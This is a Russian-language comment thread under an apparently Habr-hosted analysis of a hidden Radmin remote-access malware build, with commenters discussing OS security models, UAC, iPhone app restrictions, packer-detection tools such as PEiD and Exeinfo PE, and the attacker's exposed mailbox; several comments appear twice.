Хорошим примером является айфон, где конечно не выполняются все указанные пункты, но он довольно-таки безопасен в плане вирусов. Ну а все эти UAC — это ерунда, так как в Windows не соблюдается ни одного пункта из перечисленных мной. Не говоря уже о том, что многим вредоносным программам не нужны права администратора (например: спам, перехват нажатий клавиш, перехват изображения экрана, веб-атаки, фейковые антивирусы, воровство документов, воровство веб-паролей, подмена страниц сайтов, например банковских) — они могут работать и с правами пользвоателя, и UAC тут бесполезен. Windows всегда делался для корпораций, где есть сис. админ, следящий за безопасностью (впрочем, с ее множеством уязвимостей даже это не помогает). Домашний пользователь изначально был брошен один на один с взломщиками и хакерами, последствия чего — миллионные ботнеты.
Ваше решение — типичный пример перекладывания проблемы с малокомпетентного человека (разработчика) на абсолютно некомпетентного, вместо ее решения, типичный майкрософтовско-линуксовый подход.
Более правильное решение — радикально ограничить права программ с неизвестным источником: запретить доступ к любым файлам кроме своих, и явно выбранных пользователем, запретить возможность скрытого запуска и выполнения такой программы, предоставить надежный индикатор для определения запущенной в данный момент программы, предоставить возможность в любой момент надежно завершить выполнение программы и удалить ее.
Если программам требуются повышенные привилегии, они должны быть подписаны цифр. подписью разработчиков системы, и передачу прав должен явно одобрить пользователь. При этом и для таких программ должна соблюдаться невозможность скрытого запуска, и невозможность предотвратить завершение и удаление программы.
Как-то так.
Хорошим примером является айфон, где конечно не выполняются все указанные пункты, но он довольно-таки безопасен в плане вирусов. Ну а все эти UAC — это ерунда, так как в Windows не соблюдается ни одного пункта из перечисленных мной. Не говоря уже о том, что многим вредоносным программам не нужны права администратора (например: спам, перехват нажатий клавиш, перехват изображения экрана, веб-атаки, фейковые антивирусы, воровство документов, воровство веб-паролей, подмена страниц сайтов, например банковских) — они могут работать и с правами пользвоателя, и UAC тут бесполезен. Windows всегда делался для корпораций, где есть сис. админ, следящий за безопасностью (впрочем, с ее множеством уязвимостей даже это не помогает). Домашний пользователь изначально был брошен один на один с взломщиками и хакерами, последствия чего — миллионные ботнеты.
>Хорошим примером является айфон, где конечно не выполняются все указанные пункты, но он довольно-таки безопасен в плане вирусов.
Айфой безопасен ровно настолько, насколько безопасен любой дистрибутив Linux: пока юзер ставит программы из репозитория, всё в порядке. Как только начинается софт с файлопомоек — всё, приехали. Тут тебе и трояны, и спам-боты и прочие прелести.
Айфой безопасен ровно настолько, насколько безопасен любой дистрибутив Linux: пока юзер ставит программы из репозитория, всё в порядке. Как только начинается софт с файлопомоек — всё, приехали. Тут тебе и трояны, и спам-боты и прочие прелести.
Редкая птица долетит до середины Днепра, редкий юзер додумается заполучить себе рут-доступ.
Обычный юзер на Афон программы не ставит.
Только сервер Великой Корпорации Эппл имеет такой уровень доступа к Айфону, чтобы ставить туда программы.
Обычный юзер на Афон программы не ставит.
Только сервер Великой Корпорации Эппл имеет такой уровень доступа к Айфону, чтобы ставить туда программы.
На айфон нельзя поставить софт с файлопомойки (а рутование — процесс недоступный пользвотелю-чайнику). Но в плане безопасности, да, она там обеспечена не столько устройством системы, сколько именно ограничением на доступ к диску устройства. Увы, нормальную в плане бесзопасности ОС пока никто не осилил выпустить (а у меня нет ни времени, ни ресурсов для ее выпуска, печально). Вроде Google OS какие-то менры придумывает в плане безопасности, но у нее других недостатков столько, что даже смотреть на нее не хочется.
Ну так вирусописатель на сайте или в письме напишет инструкцию, как его книгу сделать запускаемой читабельной.
Надеюсь, вы изменили пароль на почте, чтобы оградить незадачливых пользователей от потенциальных проблем?
И еще вопрос по теме. Сейчас есть какой-то современный аналог PEiD? А то он уже черти знает сколько не обновляется и, судя по официальному сайту, больше и не будет.
И еще вопрос по теме. Сейчас есть какой-то современный аналог PEiD? А то он уже черти знает сколько не обновляется и, судя по официальному сайту, больше и не будет.
пароль на яндексе менять бесполезно — без ответа на q/a не возможно сменить серкетный вопрос, а следовательно возврат почты — дело одной минуты.
Аналог PEiD есть — это Exeinfo PE. Обновляется регулярно. В данный момент оф.сайт почему-то недоступен.
Аналог PEiD есть — это Exeinfo PE. Обновляется регулярно. В данный момент оф.сайт почему-то недоступен.
Вон оно что. А я то на днях ужаснулся, когда увидел регистрацию нового ящика на mail.ru с обязательной привязкой к телефону. Если, конечно, у меня с головой все в порядке.
За программу спасибо, как сайт заработает посмотрю.
За программу спасибо, как сайт заработает посмотрю.
Кстати, совсем забыл про RDG Packer Detector.
rdgsoft.8k.com/
Тоже постоянно обновляемая мощная тулза.
rdgsoft.8k.com/
Тоже постоянно обновляемая мощная тулза.
Сайт доступен. Опера 11 — ни скачать, и скрин глянуть. Что ж такое :-/
А ведь поддомен ftp.on.ufanet.ru должен быть по идее привязан к номеру договора клиента с Уфанетом и паролю от биллинга. Будет забавно, если школьник использовал свои реальные данные.
просто несколько импровезированный
Разберем комманды по порядку.
Братюнь, пофикси: 1. импровизация, 2. команда.
Разберем комманды по порядку.
Братюнь, пофикси: 1. импровизация, 2. команда.
Немного не по теме, но все-таки: формат JPEG не очень подходит для скриншотов. Use PNG, Luke! :-)
Судя потому, что, как указал автор топика, в почтовом ящике находится большой список ip-адресов жертв, успех данной сборки «на лицо». К сожалению, не каждый пользователь ПК знает, как защитить себя от вирусов на должном уровне. И, зачастую, ограничивается одним антивирусом с включенным резидентным сканером. Даже если пользователю объясняешь, что антивирус — не панацея от вирусов, все равно, раз в месяц приходится восстанавливать работоспособность системы, чистить от различного рода вирусни. Встречаются, как простые win-блокеры, так и более продвинутые разработки.
Сам в свое время занимался написанием различного рода «зловредного ПО» для реализации шуток над сотрудниками компании 1 апреля и в «256 день». Также подкреплял свои познания в различного рода компьютерных журналах, где «не вкрадчиво» описывалась работа того или иного нового интересного вируса, без дополнительных подробностей о методах реализации, так сказать, раскрывалась основная суть и алгоритм работы, но достаточная для понимания тем, кого это интересовало как теоретическая основа. С тех пор имею некоторое понимание о том, как большую часть вирусов нейтрализовать и убрать из системы, а заодно и закрыть возможность ее повторения. Но большая часть знакомых поражает своим мышлением и заново открывает доступ для заразы, как только возвращаешь им права администратора по их требованию.
Сам в свое время занимался написанием различного рода «зловредного ПО» для реализации шуток над сотрудниками компании 1 апреля и в «256 день». Также подкреплял свои познания в различного рода компьютерных журналах, где «не вкрадчиво» описывалась работа того или иного нового интересного вируса, без дополнительных подробностей о методах реализации, так сказать, раскрывалась основная суть и алгоритм работы, но достаточная для понимания тем, кого это интересовало как теоретическая основа. С тех пор имею некоторое понимание о том, как большую часть вирусов нейтрализовать и убрать из системы, а заодно и закрыть возможность ее повторения. Но большая часть знакомых поражает своим мышлением и заново открывает доступ для заразы, как только возвращаешь им права администратора по их требованию.
в саппорт уфанета можно уже не писать письма, мы в курсе и предпринимаем все необходимые действия, какие можем (серьёзно много писем пришло на почту).
То есть если на компьютере установлена какая-то защита, кроме стандартной, то все ок и враг не пройдет?
Спасибо автору топика за интересный материал и большинству комментаторов за не менее интересные комментарии. С огромным удовольствием прочитал всё.
Sign up to leave a comment.
Анализ очередного варианта скрытого радмина